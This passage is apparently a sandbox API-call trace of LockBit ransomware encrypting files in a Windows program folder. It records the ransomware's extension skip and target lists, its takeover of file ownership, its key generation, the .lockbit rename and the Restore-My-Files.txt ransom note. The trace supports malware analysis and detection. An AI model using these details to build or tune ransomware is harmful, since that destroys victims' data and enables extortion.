pSecurityDescriptor=0x3d6aa94) returned 1 [0082.156] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.157] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.157] CloseHandle (hObject=0x3b8) returned 1 [0082.157] free (_Block=0x77d800) [0082.157] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_select-highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0082.157] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.157] malloc (_Size=0x40068) returned 0x2031ed0 [0082.159] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=3143) returned 1 [0082.159] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.159] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0082.159] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.160] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0082.160] ReadFile (in: hFile=0x3b8, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0082.163] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.164] malloc (_Size=0xc6) returned 0x77d800 [0082.164] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0082.164] free (_Block=0x77d800) [0082.164] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0082.164] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0082.164] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.164] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x712ec7c5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x712ec7c5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc47, dwReserved0=0x0, dwReserved1=0x0, cFileName="Title_select-highlight.png", cAlternateFileName="")) returned 0 [0082.165] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0082.165] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e96ab6a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e96ab6a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12ea, dwReserved0=0x520150, dwReserved1=0x0, cFileName="menu_style_default_Thumbnail.png", cAlternateFileName="")) returned 1 [0082.165] lstrcmpiW (lpString1=".", lpString2="menu_style_default_Thumbnail.png") returned -1 [0082.165] lstrcmpiW (lpString1="..", lpString2="menu_style_default_Thumbnail.png") returned -1 [0082.165] PathFindExtensionW (pszPath="menu_style_default_Thumbnail.png") returned=".png" [0082.165] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.165] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.165] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.165] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.165] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.165] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.165] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.165] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.165] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.165] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.165] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.165] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.166] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.166] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.166] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.166] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.166] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.166] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.166] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.166] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.166] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.166] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.166] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.166] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.166] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.166] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.166] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.166] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.166] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.166] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.166] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.167] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.167] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.167] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.167] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.167] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.167] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.167] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.167] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.167] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.167] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.167] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.167] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.167] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.167] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.167] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.167] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.167] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="menu_style_default_Thumbnail.png") returned 1 [0082.167] lstrcmpiW (lpString1="ntldr", lpString2="menu_style_default_Thumbnail.png") returned 1 [0082.167] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="menu_style_default_Thumbnail.png") returned 1 [0082.168] lstrcmpiW (lpString1="bootsect.bak", lpString2="menu_style_default_Thumbnail.png") returned -1 [0082.168] lstrcmpiW (lpString1="autorun.inf", lpString2="menu_style_default_Thumbnail.png") returned -1 [0082.168] lstrcmpiW (lpString1="thumbs.db", lpString2="menu_style_default_Thumbnail.png") returned 1 [0082.168] lstrcmpiW (lpString1="iconcache.db", lpString2="menu_style_default_Thumbnail.png") returned -1 [0082.168] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0082.168] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png") returned=".png" [0082.168] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.168] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.168] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.168] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.168] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.168] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.168] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.168] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.168] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.168] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.168] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.168] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.168] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.168] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.169] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.169] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.169] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.169] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.169] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.169] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.169] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.169] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.169] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.169] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.169] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.169] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.169] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.169] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.169] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.lockbit") returned 85 [0082.169] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\menu_style_default_thumbnail.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.179] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.179] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.179] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.179] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.179] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.203] RtlFreeAnsiString (AnsiString="\\") [0082.203] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3bc) returned 0x0 [0082.203] malloc (_Size=0x200) returned 0x77d800 [0082.203] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0082.203] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.203] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.203] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.204] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.204] CloseHandle (hObject=0x3bc) returned 1 [0082.204] free (_Block=0x77d800) [0082.204] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\menu_style_default_thumbnail.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0082.204] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.204] malloc (_Size=0x40068) returned 0x1fb18c0 [0082.205] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4842) returned 1 [0082.205] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.205] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.205] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0082.205] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.206] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.206] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0082.206] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.208] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.208] malloc (_Size=0xc0) returned 0x77d800 [0082.208] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0082.209] free (_Block=0x77d800) [0082.209] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0082.209] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0082.209] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.209] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ef11f38, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ef11f38, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0082.209] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0082.209] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0082.209] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0082.209] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.209] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.209] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.209] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.209] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.209] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.210] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.210] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.210] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.210] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.210] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.210] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.211] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.211] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.211] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.211] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.211] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.211] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.211] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.211] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.211] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.211] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.211] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.211] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.211] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.211] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.211] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.211] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.211] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.211] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.211] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0082.211] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0082.211] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0082.211] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0082.211] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0082.212] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0082.212] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0082.212] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0082.212] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png") returned=".png" [0082.212] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.212] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.212] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.212] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.212] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.212] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.212] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.212] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.212] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.212] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.212] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.212] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.212] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.212] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.212] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.212] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.212] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.212] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.213] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.213] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.213] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.213] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.213] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.213] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.213] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.213] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.213] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.213] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.213] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png.lockbit") returned 85 [0082.213] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.214] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.214] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.214] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.214] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.214] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.215] RtlFreeAnsiString (AnsiString="\\") [0082.215] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3c4) returned 0x0 [0082.215] malloc (_Size=0x200) returned 0x77d800 [0082.215] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0082.215] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.215] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.215] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.216] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0082.216] CloseHandle (hObject=0x3c4) returned 1 [0082.216] free (_Block=0x77d800) [0082.216] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.216] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.216] malloc (_Size=0x40068) returned 0x3d70048 [0082.216] 